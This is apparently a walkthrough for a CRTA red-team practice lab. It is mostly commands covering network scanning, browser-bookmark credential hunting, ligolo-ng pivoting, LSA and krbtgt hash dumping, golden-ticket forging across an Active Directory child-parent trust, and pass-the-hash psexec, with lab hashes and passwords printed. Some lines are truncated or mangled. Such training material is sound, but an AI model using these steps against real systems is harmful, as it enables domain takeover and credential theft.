CRTA Practise Lab Walkthrough - CRTA_Practise_Lab_Walkthrough
CRTA Practise Lab Walkthrough - CRTA_Practise_Lab_Walkthrough
VPN: 10.10.200.0/24
Initial Access
Unset
nmap -sn 192.168.80.0/24
PS : If you cannot discover the IPs, the server have enabled temporary ping
blocking. You can specifically scan the following IPs.
Unset
nmap -sC -sV 192.168.80.10
There we can see signup link we can try signing up the new account if it
works or not
Then we intercepted some of the traffic from the website and one
interesting field that we found was newsletter email field.
Unset
ssh [email protected]
Now let’s search for browser history / bookmarks, it has been found that
the machine has Mozilla Firefox installed.
Unset
ls -la .mozilla/
cd .mozilla/firefox/
# The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release
Unset
sqlite3 places.sqlite
.tables
select * from moz_bookmarks;
Unset
#Attacker Machine, download proxy & agent :
#Proxy
wget
https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_pr
oxy_0.4.3_Linux_64bit.tar.gz
#Agent
wget
https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_ag
ent_0.4.3_Linux_64bit.tar.gz
Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim
machine.
Unset
# Attacker Machine
Confirm the route on your attacker machine. The internal IP range is now
added in the route.
Unset
./proxy -selfcert -laddr 0.0.0.0:443
Transfer the agent on the victim machine & start the connection
Unset
#Replace this with your attacker IP address.
On the server side, we can check that the agent connected successfully.
Unset
session
list_tunnels
start
Now, fire up a new terminal & check that we can now access the internal IP
range 192.168.98.0/24
Unset
nmap -sn 192.168.98.0/24
Unset
#Create a txt file with live hosts in the 192.168.98.0/24 network :
cat target.txt
192.168.98.2
192.168.98.15
192.168.98.30
192.168.98.120
Now, let’s dump the LSA process using crackmapexec toolkit, it utilizes
impacket's module secretsdump for the same.
Unset
crackmapexec --verbose smb 192.168.98.30 -u john -p User1@#$%6 --lsa
Since we know the machine name & the domain, let’s update the same on
our hosts file.
Unset
sudo nano /etc/hosts
We are local administrator in the Child Domain Controller. Let's extract the
hash of “krbtgt” account using impacket secretsdump script. We will forge
a golden ticket to compromise the Parent Domain Controller.
Unset
secretsdump.py -debug child/corpmngr:'User4&*&*'@cdc.child.warfare.corp
-just-dc-user 'child\krbtgt'
#Results :
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e57dd34c1871b7a23fb17a77dec9b900
krbtgt:aes256-cts-hmac-sha1-96:ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c1
0ab1031da11152611b2
Unset
lookupsid.py child/corpmngr:'User4&*&*'@child.warfare.corp
lookupsid.py child/corpmngr:'User4&*&*'@warfare.corp
Unset
ticketer.py -domain child.warfare.corp -aesKey
ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2 -domain-sid
S-1-5-21-3754860944-83624914-1883974761 -groups 516 -user-id 1106 -extra-sid
S-1-5-21-3375883379-808943238-3239386119-516,S-1-5-9 'corpmngr'
Unset
export KRB5CCNAME=corpmngr.ccache
Unset
getST.py -spn 'CIFS/dc01.warfare.corp' -k -no-pass
child.warfare.corp/corpmngr -debug
Unset
export KRB5CCNAME=corpmngr@[email protected]
Unset
secretsdump.py -k -no-pass dc01.warfare.corp -just-dc-user
'warfare\Administrator' -debug
Unset
psexec.py -debug 'warfare/[email protected]' -hashes
aad3b435b51404eeaad3b435b51404ee:a2f7b77b62cd97161e18be2ffcfdfd60
If you like the practice lab, please give us a shoutout. Also, once you are
ready, feel free to drop an email to the support team
([email protected]) providing your availability in British
Summer Time (BST) in date & time format.